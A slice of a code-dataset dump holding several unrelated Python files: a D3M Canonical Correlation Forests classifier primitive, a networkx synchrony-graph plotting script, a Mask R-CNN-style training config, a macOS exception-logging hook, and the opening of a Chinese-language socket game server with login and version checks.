description=\"Whether to use projection bootstrapping. If set to default, then true unless lambda=D, i.e. we all features at each node. In this case we resort to bagging instead of projection bootstrapping\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n treeRotation = hyperparams.Enumeration[str](\n values=['none', 'pca', 'random', 'rotationForest'],\n default='none',\n description='Pre-rotation to be applied to each tree seperately before rotating.',\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n propTrain = hyperparams.Bounded[float](\n lower=0.1,\n upper=1.0,\n default=1.0,\n description=\"Proportion of the data to train each tree on, but for large datasets it may be possible to only use a subset of the data for training each tree.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n # Numerical stability options. Default values works for most cases\n epsilonCCA = hyperparams.Hyperparameter[float](\n default=1.0e-04,\n description=\"Tolerance parameter for rank reduction during the CCA. It can be desirable to lower if the data has extreme correlation, in which this finite value could eliminate the true signal\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n mseErrorTolerance = hyperparams.Hyperparameter[float](\n default=1e-6,\n description=\" When doing regression with mse splits, the node is made into a leaf if the mse (i.e. variance) of the data is less than this tolerance times the mse of the full data set.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n maxDepthSplit = hyperparams.Hyperparameter[str](\n default='stack',\n description=\"Maximum depth of a node when splitting is still allowed. When set to 'stack' this is set to the maximum value that prevents crashes (usually ~500 which should never really be reached in sensible scenarios)\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n XVariationTol = hyperparams.Hyperparameter[float](\n default=1.0e-10,\n description=\"Points closer than this tolerance (after scaling the data to unit standard deviation) are considered the same the avoid splitting on numerical error. Rare would want to change.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n # Options that may want to be set if using algorithms building on CCFs\n RotForM = hyperparams.Hyperparameter[int](\n default=3,\n description=\"Size of feature subsets taken for each rotation. Default as per WEKA and rotation forest paper\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n RotForpS = hyperparams.Hyperparameter[float](\n default=0.7500,\n description=\"Proportion of points to subsample for calculating each PCA projection. Default as per WEKA but not rotation forest paper\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n RotForpClassLeaveOut = hyperparams.Hyperparameter[float](\n default=0.5000,\n description=\"Proportion of classes to randomly eliminate for each PCA projection.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n # Properties that can be set but should generally be avoided, using Default works best in most cases.\n minPointsForSplit = hyperparams.Hyperparameter[int](\n default=2,\n description=\"Minimum points for parent node\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n dirIfEqual = hyperparams.Enumeration[str](\n values=['first', 'rand'],\n default='first',\n description=\" When multiple projection vectors can give equivalent split criterion scores, one can either choose which to use randomly ('rand') or take the first ('first') on the basis that the components are in decreasing order of correlation for CCA.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n bContinueProjBootDegenerate = hyperparams.UniformBool(\n default=True,\n description=\"In the scenario where the projection bootstrap makes the local data pure or have no X variation, the algorithm can either set the node to be a leaf or resort to using the original data for the CCA\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n multiTaskGainCombination = hyperparams.Enumeration[str](\n values=['mean', 'max'],\n default='mean',\n description=\"Method for combining multiple gain metrics in multi-output tasks. Valid options are 'mean' (default) - average of the gains which for all the considered metrics is equal to the joint gain, or the 'max' gain on any of the tasks.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n missingValuesMethod = hyperparams.Enumeration[str](\n values=['mean', 'random'],\n default='mean',\n description=\"Method for dealing with missing values.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n bUseOutputComponentsMSE = hyperparams.UniformBool(\n default=False,\n description=\"If true, doing regression with multiple outputs and doing CCA projections.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n # Options that allow nonlinear features to be included in the CCA\n # in accordance with Lopez-Paz's randomized kernel cca.\n bRCCA = hyperparams.UniformBool(\n default=False,\n description=\"Options that allow nonlinear features to be included in the CCA.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n rccaLengthScale = hyperparams.Hyperparameter[float](\n default=0.1000,\n description=\"Parameter for bRCCA, if set to True.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n rccaNFeatures = hyperparams.Hyperparameter[int](\n default=50,\n description=\"Parameter for bRCCA, if set to True.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n rccaRegLambda = hyperparams.Hyperparameter[float](\n default=1.0e-03,\n description=\"Parameter for bRCCA, if set to True.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n rccaIncludeOriginal = hyperparams.UniformBool(\n default=False,\n description=\"Parameter for bRCCA, if set to True.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n # Inputs and outputs HyperParams\n use_inputs_columns = hyperparams.Set(\n elements=hyperparams.Hyperparameter[int](-1),\n default=(),\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"A set of inputs column indices to force primitive to operate on. If any specified column cannot be used, it is skipped.\",\n )\n exclude_inputs_columns = hyperparams.Set(\n elements=hyperparams.Hyperparameter[int](-1),\n default=(),\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"A set of inputs column indices to not operate on. Applicable only if \\\"use_columns\\\" is not provided.\",\n )\n use_outputs_columns = hyperparams.Set(\n elements=hyperparams.Hyperparameter[int](-1),\n default=(),\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"A set of outputs column indices to force primitive to operate on. If any specified column cannot be used, it is skipped.\",\n )\n exclude_outputs_columns = hyperparams.Set(\n elements=hyperparams.Hyperparameter[int](-1),\n default=(),\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"A set of outputs column indices to not operate on. Applicable only if \\\"use_columns\\\" is not provided.\",\n )\n return_result = hyperparams.Enumeration(\n values=['append', 'replace', 'new'],\n default='append', # Default value depends on the nature of the primitive.\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"Should resulting columns be appended, should they replace original columns, or should only resulting columns be returned?\",\n )\n add_index_columns = hyperparams.UniformBool(\n default=True,\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"Also include primary index columns if input data has them. Applicable only if \\\"return_result\\\" is set to \\\"new\\\".\",\n )\n error_on_no_columns = hyperparams.UniformBool(\n default=True,\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"Throw an exception if no column is selected/provided. Otherwise issue a warning.\",\n )\n\n\nclass CanonicalCorrelationForestsClassifierPrimitive(SupervisedLearnerPrimitiveBase[Inputs, Outputs, Params, Hyperparams]):\n \"\"\"\n Canonical Correlation Forests Classifier is a decision tree ensemble method. CCFs naturally\n accommodate multiple outputs, provide a similar computational complexity to random forests,\n and inherit their impressive robustness to the choice of input parameters.\n It uses semantic types to determine which columns to operate on.\n Citation: https://arxiv.org/abs/1507.05444\n -------------\n Inputs: DataFrame of features of shape: NxM, where N = samples and M = features.\n Outputs: DataFrame containing the target column of shape Nx1\n -------------\n \"\"\"\n # Metadata\n __author__ = 'UBC DARPA D3M Team, Tony Joseph '\n metadata = metadata_base.PrimitiveMetadata({\n \"id\": \"28e8840d-7794-40d2-b5d6-c9e136a6e51e\",\n \"version\": config.VERSION,\n \"name\": \"Canonical Correlation Forests Classifier\",\n \"description\": \"A decision tree ensemble primitive like random forests\",\n \"python_path\": \"d3m.primitives.classification.canonical_correlation_forests.UBC\",\n \"primitive_family\": metadata_base.PrimitiveFamily.CLASSIFICATION,\n \"algorithm_types\": [metadata_base.PrimitiveAlgorithmType.DECISION_TREE,\\\n metadata_base.PrimitiveAlgorithmType.ENSEMBLE_LEARNING,\\\n metadata_base.PrimitiveAlgorithmType.CANONICAL_CORRELATION_ANALYSIS,],\n \"source\": {\n \"name\": config.D3M_PERFORMER_TEAM,\n \"contact\": config.D3M_CONTACT,\n \"uris\": [config.REPOSITORY],\n },\n \"keywords\": ['canonical correlation forests', 'tree ensemble method', 'decision tree'],\n \"installation\": [config.INSTALLATION],\n \"hyperparams_to_tune\": ['nTrees', 'splitCriterion']\n })\n\n\n def __init__(self, *, hyperparams: Hyperparams, random_seed: int = 0, _verbose: int = 0) -> None:\n super().__init__(hyperparams=hyperparams, random_seed=random_seed)\n self.hyperparams = hyperparams\n self._random_state = random_seed\n self._verbose = _verbose\n self._training_inputs: Inputs = None\n self._training_outputs: Outputs = None\n self._CCF = {}\n self._label_name_columns = None\n # Is the model fit on the training data\n self._fitted = False\n\n\n def set_training_data(self, *, inputs: Inputs, outputs: Outputs) -> None:\n self._training_inputs = inputs\n self._training_outputs = outputs\n self._new_training_data = True\n self._fitted = False\n\n\n def _create_learner_param(self) -> None:\n # Setup HyperParams\n self.optionsClassCCF = {}\n self.optionsClassCCF['nTrees'] = self.hyperparams['nTrees']\n self.optionsClassCCF['parallelprocessing'] = self.hyperparams['parallelprocessing']\n self.optionsClassCCF['lambda'] = self.hyperparams['lambda_']\n self.optionsClassCCF['splitCriterion'] = self.hyperparams['splitCriterion']\n self.optionsClassCCF['minPointsLeaf'] = self.hyperparams['minPointsLeaf']\n self.optionsClassCCF['bSepPred'] = self.hyperparams['bSepPred']\n self.optionsClassCCF['taskWeights'] = self.hyperparams['taskWeights']\n self.optionsClassCCF['bProjBoot'] = self.hyperparams['bProjBoot']\n self.optionsClassCCF['bBagTrees'] = self.hyperparams['bBagTrees']\n self.optionsClassCCF['projections'] = self.hyperparams['projections']\n self.optionsClassCCF['treeRotation'] = self.hyperparams['treeRotation']\n self.optionsClassCCF['propTrain'] = self.hyperparams['propTrain']\n self.optionsClassCCF['epsilonCCA'] = self.hyperparams['epsilonCCA']\n self.optionsClassCCF['mseErrorTolerance'] = self.hyperparams['mseErrorTolerance']\n self.optionsClassCCF['maxDepthSplit'] = self.hyperparams['maxDepthSplit']\n self.optionsClassCCF['XVariationTol'] = self.hyperparams['XVariationTol']\n self.optionsClassCCF['RotForM'] = self.hyperparams['RotForM']\n self.optionsClassCCF['RotForpS'] = self.hyperparams['RotForpS']\n self.optionsClassCCF['RotForpClassLeaveOut'] = self.hyperparams['RotForpClassLeaveOut']\n self.optionsClassCCF['minPointsForSplit'] = self.hyperparams['minPointsForSplit']\n self.optionsClassCCF['dirIfEqual'] = self.hyperparams['dirIfEqual']\n self.optionsClassCCF['bContinueProjBootDegenerate'] = self.hyperparams['bContinueProjBootDegenerate']\n self.optionsClassCCF['multiTaskGainCombination'] = self.hyperparams['multiTaskGainCombination']\n self.optionsClassCCF['missingValuesMethod'] = self.hyperparams['missingValuesMethod']\n self.optionsClassCCF['bUseOutputComponentsMSE'] = self.hyperparams['bUseOutputComponentsMSE']\n self.optionsClassCCF['bRCCA'] = self.hyperparams['bRCCA']\n self.optionsClassCCF['rccaLengthScale'] = self.hyperparams['rccaLengthScale']\n self.optionsClassCCF['rccaNFeatures'] = self.hyperparams['rccaNFeatures']\n self.optionsClassCCF['rccaRegLambda'] = self.hyperparams['rccaRegLambda']\n self.optionsClassCCF['rccaIncludeOriginal'] = self.hyperparams['rccaIncludeOriginal']\n self.optionsClassCCF['classNames'] = np.array([])\n self.optionsClassCCF['org_muY'] = np.array([])\n self.optionsClassCCF['org_stdY'] = np.array([])\n self.optionsClassCCF['mseTotal'] = np.array([])\n\n\n def fit(self, *, timeout: float = None, iterations: int = None) -> CallResult[None]:\n if self._fitted:\n return CallResult(None)\n\n if self._training_inputs is None or self._training_outputs is None:\n raise exceptions.InvalidStateError(\"Missing training data.\")\n self._new_training_data = False\n\n XTrain, _ = self._select_inputs_columns(self._training_inputs)\n YTrain, _ = self._select_outputs_columns(self._training_outputs)\n \n self._create_learner_param()\n self._store_columns_metadata_and_names(XTrain, YTrain)\n\n # Fit data\n CCF = genCCF(XTrain, YTrain, nTrees=self.optionsClassCCF['nTrees'], optionsFor=self.optionsClassCCF, do_parallel=self.optionsClassCCF['parallelprocessing'])\n\n self._CCF = CCF\n self._fitted = True\n\n return CallResult(None)\n\n\n def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> CallResult[Outputs]:\n \"\"\"\n Inputs: DataFrame of features\n Returns: Pandas DataFrame Containing predictions\n \"\"\"\n # Inference\n if not self._fitted:\n raise PrimitiveNotFittedError(\"Primitive not fitted.\")\n\n XTest, columns_to_use = self._select_inputs_columns(inputs)\n\n if len(XTest.columns):\n # Prediction\n YpredCCF, _, _ = predictFromCCF(self._CCF, XTest)\n\n output_columns = [self._wrap_predictions(YpredCCF)]\n\n outputs = base_utils.combine_columns(inputs, columns_to_use, output_columns, return_result=self.hyperparams['return_result'], add_index_columns=self.hyperparams['add_index_columns'])\n\n return base.CallResult(outputs)\n\n\n def get_params(self) -> Params:\n if not self._fitted:\n return Params(CCF_=None,\n attribute_columns_names=self._attribute_columns_names,\n target_columns_metadata=self._target_columns_metadata,\n target_columns_names=self._target_columns_names)\n\n return Params(CCF_=self._CCF,\n attribute_columns_names=self._attribute_columns_names,\n target_columns_metadata=self._target_columns_metadata,\n target_columns_names=self._target_columns_names)\n\n\n def set_params(self, *, params: Params) -> None:\n self._CCF = params['CCF_']\n self._attribute_columns_names = params['attribute_columns_names']\n self._target_columns_metadata = params['target_columns_metadata']\n self._target_columns_names = params['target_columns_names']\n self._fitted = True\n\n\n def __getstate__(self) -> dict:\n state = super().__getstate__()\n\n state['random_state'] = self._random_state\n\n return state\n\n\n def __setstate__(self, state: dict) -> None:\n super().__setstate__(state)\n\n self._random_state = state['random_state']\n\n\n def _update_predictions_metadata(self, outputs: Optional[Outputs], target_columns_metadata: List[OrderedDict]) -> metadata_base.DataMetadata:\n outputs_metadata = metadata_base.DataMetadata()\n if outputs is not None:\n outputs_metadata = outputs_metadata.generate(outputs)\n\n for column_index, column_metadata in enumerate(target_columns_metadata):\n outputs_metadata = outputs_metadata.update_column(column_index, column_metadata)\n\n return outputs_metadata\n\n\n def _wrap_predictions(self, predictions: np.ndarray) -> Outputs:\n outputs = container.DataFrame(predictions, generate_metadata=False)\n outputs.metadata = self._update_predictions_metadata(outputs, self._target_columns_metadata)\n outputs.columns = self._target_columns_names\n return outputs\n\n\n def _get_target_columns_metadata(self, outputs_metadata: metadata_base.DataMetadata) -> List[OrderedDict]:\n outputs_length = outputs_metadata.query((metadata_base.ALL_ELEMENTS,))['dimension']['length']\n\n target_columns_metadata: List[OrderedDict] = []\n for column_index in range(outputs_length):\n column_metadata = OrderedDict(outputs_metadata.query_column(column_index))\n\n # Update semantic types and prepare it for predicted targets.\n semantic_types = list(column_metadata.get('semantic_types', []))\n if 'https://metadata.datadrivendiscovery.org/types/PredictedTarget' not in semantic_types:\n semantic_types.append('https://metadata.datadrivendiscovery.org/types/PredictedTarget')\n semantic_types = [semantic_type for semantic_type in semantic_types if semantic_type != 'https://metadata.datadrivendiscovery.org/types/TrueTarget']\n column_metadata['semantic_types'] = semantic_types\n\n target_columns_metadata.append(column_metadata)\n\n return target_columns_metadata\n\n\n def _store_columns_metadata_and_names(self, inputs: Inputs, outputs: Outputs) -> None:\n _attribute_columns_names = list(inputs.columns)\n self._attribute_columns_names = [str(name) for name in _attribute_columns_names]\n self._target_columns_metadata = self._get_target_columns_metadata(outputs.metadata)\n self._target_columns_names = list(outputs.columns)\n\n\n def _can_use_inputs_column(self, inputs_metadata: metadata_base.DataMetadata, column_index: int) -> bool:\n column_metadata = inputs_metadata.query((metadata_base.ALL_ELEMENTS, column_index))\n\n return 'https://metadata.datadrivendiscovery.org/types/Attribute' in column_metadata.get('semantic_types', [])\n\n\n def _get_inputs_columns(self, inputs_metadata: metadata_base.DataMetadata) -> List[int]:\n def can_use_column(column_index: int) -> bool:\n return self._can_use_inputs_column(inputs_metadata, column_index)\n\n columns_to_use, columns_not_to_use = base_utils.get_columns_to_use(inputs_metadata, self.hyperparams['use_inputs_columns'],\\\n self.hyperparams['exclude_inputs_columns'], can_use_column)\n\n if not columns_to_use:\n if self.hyperparams['error_on_no_columns']:\n raise ValueError(\"No inputs columns.\")\n else:\n self.logger.warning(\"No inputs columns.\")\n\n if self.hyperparams['use_inputs_columns'] and columns_to_use and columns_not_to_use:\n self.logger.warning(\"Not all specified inputs columns can be used. Skipping columns: %(columns)s\", {\n 'columns': columns_not_to_use,\n })\n\n return columns_to_use\n\n\n def _can_use_outputs_column(self, outputs_metadata: metadata_base.DataMetadata, column_index: int) -> bool:\n column_metadata = outputs_metadata.query((metadata_base.ALL_ELEMENTS, column_index))\n\n return 'https://metadata.datadrivendiscovery.org/types/TrueTarget' in column_metadata.get('semantic_types', [])\n\n\n def _get_outputs_columns(self, outputs_metadata: metadata_base.DataMetadata) -> List[int]:\n def can_use_column(column_index: int) -> bool:\n return self._can_use_outputs_column(outputs_metadata, column_index)\n\n columns_to_use, columns_not_to_use = base_utils.get_columns_to_use(outputs_metadata, self.hyperparams['use_outputs_columns'], self.hyperparams['exclude_outputs_columns'], can_use_column)\n\n if not columns_to_use:\n if self.hyperparams['error_on_no_columns']:\n raise ValueError(\"No outputs columns.\")\n else:\n self.logger.warning(\"No outputs columns.\")\n\n if self.hyperparams['use_outputs_columns'] and columns_to_use and columns_not_to_use:\n self.logger.warning(\"Not all specified outputs columns can be used. Skipping columns: %(columns)s\", {\n 'columns': columns_not_to_use,\n })\n\n return columns_to_use\n\n\n def _select_inputs_columns(self, inputs: Inputs) -> Tuple[Inputs, List[int]]:\n columns_to_use = self._get_inputs_columns(inputs.metadata)\n\n return inputs.select_columns(columns_to_use, allow_empty_columns=True), columns_to_use\n\n\n def _select_outputs_columns(self, outputs: Outputs) -> Tuple[Outputs, List[int]]:\n columns_to_use = self._get_outputs_columns(outputs.metadata)\n\n return outputs.select_columns(columns_to_use, allow_empty_columns=True), columns_to_use\n","sub_path":"primitives_ubc/clfyCCFS/ccfsClfy.py","file_name":"ccfsClfy.py","file_ext":"py","file_size_in_byte":28553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"642770586","text":"import warnings\n#few warnings due to version mismatch for numpy,sklearn etc..\nwarnings.filterwarnings(\"ignore\")\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n#import pyspike as spk\nimport time\nimport csv\nimport pandas as pd\nfrom multiprocessing import Pool\nimport networkx as nx\n\n\ndef list_allCSV():\n\tfileNameArray = os.listdir('Hippocampal/')\n\tprint(fileNameArray)\n\treturn fileNameArray\n\ndef plotGraph(csvFile, counter):\n\t#open dataframe obtained from LocalisedSynchrony.py\n\t#df = pd.read_csv(\"synchronyDataframe.csv\")\n\tdf = pd.read_csv(csvFile)\n\tprint(df)\n\t#remove entries where synchrony values are zero\n\t#df = df[df.SyncVal != 0]\n\t#df = df[df.SyncVal > 0.5]\n\tprint(df)\n\n\t#create a list of channel number and its position in a grid\n\tchannel_num = []\n\tfor i in range(4096):\n\t\tchannel_num.append(i)\n\t#print(channel_num)\n\t#list of grid co-ordinates\n\tcoordinates = []\n\tx = 0\n\ty = 0\n\t\n\tfor x in range(64):\n\t\tfor y in range(64):\n\t\t\tcoordinates.append((y,x))\n\n\tG = nx.from_pandas_edgelist(df, 'Ch_A', 'Ch_B', 'SyncVal')\n\tedges,weights = zip(*nx.get_edge_attributes(G,'SyncVal').items())\n\t\t\n\t#pos = {0:(0,0),1:(0,1),2:(0,2),3:(0,4),4:(1,0),5:(1,1),6:(1,2),7:(1,3),8:(2,0),9:(2,1),10:(2,2),11:(2,3),12:(3,0),13:(3,1),14:(3,2),15:(3,3)}\n\tpos = dict(zip(channel_num,coordinates))\n\t\n\t#plot the network\n\tprint (\"Weights: {}\".format(weights))\n\tplt.title(\"Connectivity graph based on synchrony level(400-600ms)\")\n\tplt.xlabel(\"Channel(0-64)\")\n\tplt.ylabel(\"Channel(0-64)\")\n\tnx.draw(G,pos, with_labels=False, node_color = 'black', node_size = 1, edgelist = edges, edge_color = weights, \n\t\t\tlinewidths = 2, font_size = 6, grid = True, edge_cmap = plt.cm.jet)\n\t#nx.draw(G,pos, with_labels=False, node_color = 'blue', node_size = 10, linewidths = 1, font_size = 4,grid = True)\n\t\n\tplt.setp(plt.gca(), 'ylim', list(reversed(plt.getp(plt.gca(), 'ylim'))))\n\t\n\t\n\tplt.savefig(\"connectivity_Graph_5_{}.png\".format(counter)) #revoming the last 4 chars i.e. .csv\n\tplt.grid(True)\n\t#plt.show()\n\n'''\ndef main():\n\t\"\"\"\n\tUsing multiprocessing to generate images from the panda dataframe\n\t\"\"\n\tFileNameList = list_allCSV()\n\t#print(FileNameList[0][19:])\n\tFileNameList = [int(i) for i in FileNameList[i][:-3]]\n\t#FileNameList = FileNameList.sort()\n\tprint(FileNameList)\n\t#FileNameList[:-3].sort()\n\t\t#using 16 cores. based on how many cores you might have. change accordingly\n\t#p = Pool(16)\n\t#with Pool(10) as p: # My pc has 16 cores\n\t#p.map(plotGraph,FileNameList)\n\n\tcounter = 0\n\tfor i in range(len(FileNameList)):\n\t\t#print(\"fileName: {}\".format(FileNameList[i]))\n\t\t#plotGraph(FileNameList[i],counter)\n\t\tcounter = counter + 1\n'''\ndef singleTimeIntervalPlot():\n\t'''\n\tfor single interval plot. this allows to plot one file at a time\n\t'''\n\tcsvFile = '400.csv'\n\t\n\tplotGraph(csvFile, 400)\n\n\n\n\nif __name__ == '__main__':\n\t#main()\n\tsingleTimeIntervalPlot()","sub_path":"SynchronyMeasures/SynchronyDataframes/graph_Plot.py","file_name":"graph_Plot.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"562412394","text":"\"\"\"\nMask R-CNN\nBase Configurations class.\n\nCopyright (c) 2017 Matterport, Inc.\nLicensed under the MIT License (see LICENSE for details)\nWritten by Waleed Abdulla\n\"\"\"\n\nimport math\nimport numpy as np\nimport os\n\n\n# Base Configuration Class\n# Don't use this class directly. Instead, sub-class it and override\n# the configurations you need to change.\n\nclass Config(object):\n \"\"\"Base configuration class. For custom configurations, create a\n sub-class that inherits from this one and override properties\n that need to be changed.\n \"\"\"\n def __init__(self):\n \"\"\"Set values of computed attributes.\"\"\"\n\n # Name the configurations. For example, 'COCO', 'Experiment 3', ...etc.\n # Useful if your code needs to do things differently depending on which\n # experiment is running.\n self.NAME = \"JITNET-CITYSCAPES\" # Override in sub-classes\n\n self.DATASET_PATH = \"/SSD/video-online-lstm-pytorch/datasets/CITYSCAPES\"\n\n # Path to pretrained model\n self.PRETRAINED_MODEL_PATH = os.path.join(os.getcwd(), \"/pretrained/jitnet_ctyscapes_best.pth\")\n\n # NUMBER OF GPUs to use. For CPU use 0\n self.GPU_COUNT = 2\n\n # Number of images to train with on each GPU. A 12GB GPU can typically\n # handle 2 images of 1024x1024px.\n # Adjust based on your GPU memory and image sizes. Use the highest\n # number that your GPU can handle for best performance.\n self.IMAGES_PER_GPU = 8\n\n # Number of classification classes (including background)\n self.NUM_CLASSES = 256 # Override in sub-classes\n self.VALID_NUM_CLASSES = 19\n\n # Input image resing\n self.IMAGE_H_DIM = 256\n self.IMAGE_W_DIM = 512\n\n # Learning rate and momentum\n # The Mask RCNN paper uses lr=0.02, but on TensorFlow it causes\n # weights to explode. Likely due to differences in optimzer\n # implementation.\n self.LEARNING_RATE = 0.001\n self.LEARNING_MOMENTUM = 0.9\n\n # Weight decay regularization\n self.WEIGHT_DECAY = 0.0001\n\n # Effective batch size\n if self.GPU_COUNT > 0:\n self.BATCH_SIZE = self.IMAGES_PER_GPU * self.GPU_COUNT\n else:\n self.BATCH_SIZE = self.IMAGES_PER_GPU\n\n def display(self):\n \"\"\"Display Configuration values.\"\"\"\n print(\"\\nConfigurations:\")\n for a in dir(self):\n if not a.startswith(\"__\") and not callable(getattr(self, a)):\n print(\"{:30} {}\".format(a, getattr(self, a)))\n print(\"\\n\")\n\n\n\"\"\"TEST\nconfig = Config()\nprint(config.BATCH_SIZE)\nprint(config.GPU_COUNT)\n\"\"\"","sub_path":"config_jitnet_cityscapes.py","file_name":"config_jitnet_cityscapes.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"485686143","text":"import traceback, subprocess, os.path\n\ndef mac_except_hook(*exc_info):\n fname = os.path.expanduser('~/Documents/musclex.error.log')\n with open(fname, 'a') as f:\n f.write(''.join(traceback.format_exception(*exc_info)))\n f.close()\n applescript = \"'\\\ntell app \\\"System Events\\\" to \\\ndisplay dialog \\\"Error details are written to the file: {}.\\\" \\\nwith title \\\"Error message\\\" \\\nwith icon caution \\\nbuttons {{\\\"OK\\\"}}'\".format(fname)\n # print(applescript)\n subprocess.Popen('osascript -e ' + applescript, shell=True)\n\nhandlers = {\n 'darwin': mac_except_hook\n}","sub_path":"musclex/utils/exception_handler.py","file_name":"exception_handler.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"223545238","text":"import socket\nimport json\nimport threading\nimport server.champion\nimport server.character\nimport random\n\n\nclass 基本信息:\n 版本 = 2.1\n 更新说明 = \\\n \"全新角色、全新卡牌、全新技能,2.1新版本等你探索!\\n\" \\\n \"请于 baisebaoma.github.io 查看卡牌说明。\"\n 新版本地址 = \"http://lol.qq.com\"\n # 也许用数会比字符串快一些?\n\n\ndef 接收消息(连接):\n # 输入连接,输出一个含有所有obj的list\n\n while True:\n 全缓存 = ''\n obj分割 = list()\n try:\n # 解决断包问题\n while True:\n 缓存 = 连接.recv(1024).decode()\n 全缓存 += 缓存\n if 缓存 == '' or 缓存[-1] == '}':\n break\n\n # 解决黏包问题\n 指针 = 0\n 全缓存分割 = list()\n while 指针 < len(全缓存) - 1:\n if 全缓存[指针] == \"}\" and 全缓存[指针 + 1] == \"{\":\n 全缓存分割.append(全缓存[0:指针 + 1]) # 注意:包括开头,不包括结尾!\n 全缓存 = 全缓存[指针 + 1:]\n 指针 = -1\n 指针 += 1\n 全缓存分割.append(全缓存)\n if 全缓存分割:\n for item in 全缓存分割:\n obj分割.append(json.loads(item))\n 全缓存分割.clear()\n return obj分割\n else:\n obj = json.loads(全缓存)\n return list(obj)\n except OSError:\n print(f\"{连接.getpeername()} 的连接已断开。\")\n return\n # except OSError:\n except json.decoder.JSONDecodeError:\n if 全缓存 == '':\n print('\\n可能是客户端关闭或BUG,无法接收信息。')\n return\n else:\n print(f'\\n{全缓存}\\n')\n print('可能是黏包问题,解码失败,无法显示这句话。')\n return\n\n\ndef 用户线程(连接):\n 消息列表 = 接收消息(连接)\n # 检查版本号\n if 消息列表[0]['对象'] != 基本信息.版本: # 用【对象】存储版本号\n print(f\"尝试登录的用户({连接.getpeername()})的版本过低。已发送提示更新版本的消息。\")\n 连接.send(json.dumps(\n {\n '用户': '系统',\n '行为': '拒绝登录:版本',\n '对象': [基本信息.新版本地址, 基本信息.更新说明]\n }\n ).encode())\n # 用【对象】存储新版本地址\n if 消息列表[1:]:\n for 消息 in 消息列表[1:]:\n 处理消息(消息, 连接)\n else:\n print(f\"尝试登录的用户({连接.getpeername()})的版本正确。\")\n 连接.send(json.dumps(\n {\n '用户': '系统',\n '行为': '版本正确',\n '对象': 0\n }\n ).encode())\n\n while True:\n 消息列表 = 接收消息(连接)\n if 消息列表:\n for 消息 in 消息列表:\n 处理消息(消息, 连接)\n else:\n connection_to_be_removed = 玩家控制.搜索连接(连接)\n if connection_to_be_removed is not False:\n 玩家控制.玩家列表.remove(connection_to_be_removed)\n 连接.close()\n return False\n\n\ndef 处理消息(消息, 连接):\n # 它只能处理单条消息\n print(f\"来自 {连接.getpeername()} 的消息:{消息}\")\n if 消息['行为'] == '登录':\n\n \"\"\"\n if 消息['用户名'] == '系统': # 这个应该在客户端那边写\n print(\"不能选择“系统”为用户名,因为它在服务器内部已经使用。请重试。\")\n return\n \"\"\"\n\n '''\n # 检查版本号\n # 已经放在前面了\n if 消息['对象'] != 基本信息.版本: # 用【对象】存储版本号\n print(f\"尝试登录的用户({连接.getpeername()})的版本过低。已发送提示更新版本的消息。\")\n 连接.send(json.dumps(\n {\n '用户': '系统',\n '行为': '拒绝登录:版本',\n '对象': 基本信息.新版本地址\n }\n ).encode())\n # 用【对象】存储新版本地址\n return\n '''\n\n # 检查是否重名\n for 对象 in 玩家控制.玩家列表:\n if 对象.用户名 == 消息['用户']:\n print(f\"尝试登录的用户({连接.getpeername()})选择了一个和已存在用户相同的用户名。请重试。\")\n 连接.send(json.dumps(\n {\n '用户': '系统',\n '行为': '拒绝登录:重名',\n }\n ).encode())\n return\n\n # 以上两个都过了,那么这个玩家应该没问题(还没有写反攻击机制),先加入列表\n 玩家控制.玩家列表.append(玩家(用户名=消息['用户'], 连接=连接))\n\n # 然后发送登录成功的消息(因为这样方便一些)\n 玩家控制.私发(消息['用户'], 用户='系统', 行为=f\"成功登录\")\n\n # 给这个登录的人发送当前的玩家列表\n for 对象 in 玩家控制.玩家列表:\n 玩家控制.私发(消息['用户'], 用户=对象.用户名, 行为='登录')\n\n # 给这个登录的人发送玩家是否准备\n for 对象 in 玩家控制.玩家列表:\n if 对象.准备 is True:\n 玩家控制.广播(用户=对象.用户名, 行为='准备')\n\n # 